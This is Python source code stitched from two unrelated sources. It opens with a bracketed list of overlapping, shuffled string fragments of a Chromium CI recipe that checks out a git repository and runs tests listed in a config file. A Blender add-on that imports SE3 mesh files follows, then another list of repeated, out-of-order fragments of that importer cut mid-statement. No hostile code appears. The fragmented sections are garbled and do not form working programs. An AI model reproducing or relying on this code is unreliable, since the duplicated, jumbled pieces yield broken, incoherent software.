"open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests",
"api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') +",
"that can be # found in the LICENSE file. from recipe_engine.recipe_api import Property",
"and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test:",
"== 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def",
"l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with",
"tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output(",
"refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git',",
"c.py args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip() if",
"else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try')",
"'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api):",
"f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l",
"repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url",
"checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result",
"= [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit",
"assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and",
"repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git',",
"== 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert",
"and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield",
"tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l",
"All rights reserved. # Use of this source code is governed by a",
"= [] for l in result.stdout.splitlines(): l = l.strip() if l and not",
"by a BSD-style license that can be # found in the LICENSE file.",
"yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' )",
"refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git',",
"with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l cmd",
"'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None),",
"'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg')",
"properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None),",
"'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec",
"the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io',",
"patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url",
"is governed by a BSD-style license that can be # found in the",
"refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init',",
"a BSD-style license that can be # found in the LICENSE file. from",
"Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'),",
"Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to",
"update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform",
"l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l",
"sorted(tests): name = 'test: %s' % l cmd = l.split() if cmd[0] ==",
"= l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:])",
"Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython",
"name = 'test: %s' % l cmd = l.split() if cmd[0] == 'python'",
"= patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and refspec",
"# New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str,",
"not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s'",
"governed by a BSD-style license that can be # found in the LICENSE",
"{ # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url':",
"reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git",
"default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to",
"repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git',",
"reserved. # Use of this source code is governed by a BSD-style license",
">= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') +",
"and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init',",
"# Use of this source code is governed by a BSD-style license that",
"2016 The Chromium Authors. All rights reserved. # Use of this source code",
"= 'test: %s' % l cmd = l.split() if cmd[0] == 'python' and",
"'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url",
"Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source",
"from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES",
"len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci')",
"\"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py",
"api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l",
"api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) +",
"submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', #",
"args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield",
"license that can be # found in the LICENSE file. from recipe_engine.recipe_api import",
"can be # found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS",
"'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url,",
"Chromium Authors. All rights reserved. # Use of this source code is governed",
"= patch_ref assert repo_url and refspec, 'repository url and refspec must be given'",
"'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update',",
"'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda:",
"for l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l)",
"cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1],",
"# Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython",
"['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule",
"['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result =",
"l cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name,",
"patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref",
"be # found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS =",
"# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this",
"repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and",
"b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip()",
"for l in sorted(tests): name = 'test: %s' % l cmd = l.split()",
"patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec,",
"url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git",
"% refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update',",
"api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(),",
"# found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [",
"api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD'])",
"properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str,",
"init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url,",
"cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd)",
"default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage",
"default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository',",
"api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all')",
"Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url",
"Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git",
"DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New",
") yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52'",
"def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit'",
"help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout',",
"+ api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test:",
"default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec,"
] |
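The dispatch above treats each non-comment line of infra/config/ci.cfg as a command: a line starting with `python` is routed through the python module, and anything else becomes a plain step. That parsing rule is easy to exercise outside the recipe engine; a minimal stand-alone sketch in plain Python, with a made-up sample config:

def parse_tests(cfg_text):
    """Collect non-empty, non-comment lines, sorted as the recipe runs them."""
    tests = []
    for line in cfg_text.splitlines():
        line = line.strip()
        if line and not line.startswith('#'):
            tests.append(line)
    return sorted(tests)


def classify(cmd_line):
    """Mirror the recipe's dispatch: 'python <script> [args...]' vs. raw command."""
    cmd = cmd_line.split()
    if cmd[0] == 'python' and len(cmd) >= 2:
        return ('python', cmd[1], cmd[2:])
    return ('step', cmd)


if __name__ == '__main__':
    sample = './a.sh\n# comment\npython b.py\npython c.py args\n'
    for line in parse_tests(sample):
        print(classify(line))

Because the test loop runs under api.step.defer_results(), a failing test is recorded but the remaining tests still run, which is what the ci_fail_but_run_all test case exercises.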
import bpy
from bpy_extras.mesh_utils import ngon_tessellate
from . import se3


def get_se3_mesh_form_file(filepath):
    file_query = se3.ASCIIFileQuery(filepath)
    version = file_query.get_num_value("SE_MESH")
    mesh = se3.Mesh(version)
    num_of_layers = file_query.get_num_value("LAYERS")
    file_query.follows_block_begin_decl()  # open layers block
    processed_layers = 0
    while processed_layers < num_of_layers:
        layer_name = file_query.get_str_value("LAYER_NAME")
        layer_index = file_query.get_long_value("LAYER_INDEX")
        file_query.follows_block_begin_decl()  # open layer block
        layer = se3.Layer(layer_name, layer_index)
        mesh.layers.append(layer)
        num_of_maps = file_query.get_long_value("VERTEX_MAPS")
        file_query.follows_block_begin_decl()  # open vertex maps block
        processed_maps = 0
        num_of_texcoord_maps = 0
        num_of_weight_maps = 0
        num_of_morph_maps = 0
        while processed_maps < num_of_maps:
            map_type = file_query.get_map_type()
            map_name = file_query.get_map_name()
            file_query.follows_block_begin_decl()  # open vertex map block
            map_is_relative = False  # only morph maps carry a RELATIVE flag
            if map_type == se3.VERTEX_MAP_TYPE_MORPH:
                type_index = num_of_morph_maps
                get_map_elem = file_query.get_morph_elem
                map_is_relative = file_query.get_bool_value("RELATIVE")
                num_of_morph_maps += 1
            elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD:
                type_index = num_of_texcoord_maps
                get_map_elem = file_query.get_texcoord_elem
                num_of_texcoord_maps += 1
            elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT:
                type_index = num_of_weight_maps
                get_map_elem = file_query.get_weight_elem
                num_of_weight_maps += 1
            map = se3.VertexMap(map_type, map_name, map_is_relative)
            map.type_index = type_index
            num_of_map_elems = file_query.get_long_value("ELEMENTS")
            file_query.follows_block_begin_decl()  # open elements block
            processed_elems = 0
            while processed_elems < num_of_map_elems:
                file_query.follows_block_begin_decl()  # open element block
                map.elements.append(get_map_elem())
                file_query.follows_block_end_decl()  # close element block
                processed_elems += 1
            file_query.follows_block_end_decl()  # close elements block
            processed_maps += 1
            layer.vertex_maps_append(map)
            file_query.follows_block_end_decl()  # close vertex map block
        file_query.follows_block_end_decl()  # close vertex maps block
        num_of_verts = file_query.get_long_value("VERTICES")
        file_query.follows_block_begin_decl()  # open vertices block
        num_of_processed_vertices = 0
        while num_of_processed_vertices < num_of_verts:
            vertex = se3.Vertex()
            morph_pointers = vertex.morph_pointers
            weight_pointers = vertex.weight_pointers
            uv_pointers = vertex.uv_pointers
            file_query.follows_block_begin_decl()  # open vertex block
            num_of_pointers = file_query.get_num_of_values()
            num_of_processed_pointers = 0
            is_last_pointer = False
            last_pointer_index = num_of_pointers - 1
            while num_of_processed_pointers < num_of_pointers:
                if num_of_processed_pointers == last_pointer_index:
                    is_last_pointer = True
                vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer)
                vertex_map_index = vertex_data_pointer[0]
                vertex_map_type = layer.vertex_maps[vertex_map_index].type
                if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH:
                    morph_pointers.append(vertex_data_pointer)
                elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT:
                    weight_pointers.append(vertex_data_pointer)
                elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD:
                    uv_pointers.append(vertex_data_pointer)
                num_of_processed_pointers += 1
            layer.vertices.append(vertex)
            file_query.follows_block_end_decl()  # close vertex block
            num_of_processed_vertices += 1
        file_query.follows_block_end_decl()  # close vertices block
        num_of_polys = file_query.get_long_value("POLYGONS")
        file_query.follows_block_begin_decl()  # open polygons block
        processed_polys = 0
        while processed_polys < num_of_polys:
            poly = []
            file_query.follows_block_begin_decl()  # open polygon block
            num_of_values = file_query.get_num_of_values()
            processed_values = 0
            is_last_value = False
            last_value_idx = num_of_values - 1
            while processed_values < num_of_values:
                if processed_values == last_value_idx:
                    is_last_value = True
                poly.append(file_query.get_vert_idx(is_last_value))
                processed_values += 1
            file_query.follows_block_end_decl()  # close polygon block
            layer.polygons.append(tuple(poly))
            processed_polys += 1
        file_query.follows_block_end_decl()  # close polygons block
        num_of_poly_maps = file_query.get_long_value("POLYGON_MAPS")
        file_query.follows_block_begin_decl()  # open polygon maps block
        processed_poly_maps = 0
        while processed_poly_maps < num_of_poly_maps:
            map_type = file_query.get_map_type(False)
            map_name = file_query.get_map_name()
            map_smoothing_angle = file_query.get_num_value("POLYGON_MAP_SMOOTHING_ANGLE")
            polygon_count = file_query.get_long_value("POLYGONS_COUNT")
            file_query.follows_block_begin_decl()  # open polygon count block
            poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle)
            processed_poly_idxs = 0
            while processed_poly_idxs < polygon_count:
                poly_map.polygons.append(file_query.get_poly_idx())
                processed_poly_idxs += 1
            file_query.follows_block_end_decl()  # close polygon count block
            processed_poly_maps += 1
            layer.polygon_maps.append(poly_map)
            layer.surface_maps.append(poly_map)
        file_query.follows_block_end_decl()  # close polygon maps block
        file_query.follows_block_end_decl()  # close layer block
        processed_layers += 1
    file_query.follows_block_end_decl()  # close layers block
    return mesh
"uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data):",
"True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in",
"in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0,",
"for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if",
"block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl()",
"vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT:",
"get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1",
"math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices =",
"+= 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges",
"se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co =",
"block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open",
"- 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups =",
"def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers =",
"[] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for",
"from mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath)",
"type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name,",
"vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index =",
"num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if",
"+= 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block",
"file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems",
"map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type",
"= ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in",
"edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in",
"get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\")",
"- 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True",
"fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for",
"if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type ==",
"vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index],",
"material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges:",
"def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath = operator.filepath",
"se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count =",
"get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges",
"se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps):",
"layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block",
"else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for",
"edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return",
"= file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0",
"processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon",
"#open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open",
"while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers",
"count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl()",
"for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index",
"layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers +=",
"[] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices:",
"fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop",
"processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map",
"0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps <",
"range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in",
"= se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for",
"block processed_polys = 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open",
"= get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge:",
"faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps):",
"file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps",
"num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem",
"file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False",
"se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges):",
"num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers <",
"layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps)",
"edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index",
"= [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] =",
"from bpy_extras.mesh_utils import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath)",
"if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight",
"is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh",
"polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers",
"real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), (",
"new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1])",
"file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps",
"context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\")",
"[] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index",
"= file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index)",
"0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count",
"for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = []",
"for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon",
"edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer,",
"get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count)",
"se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE')",
"i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx,",
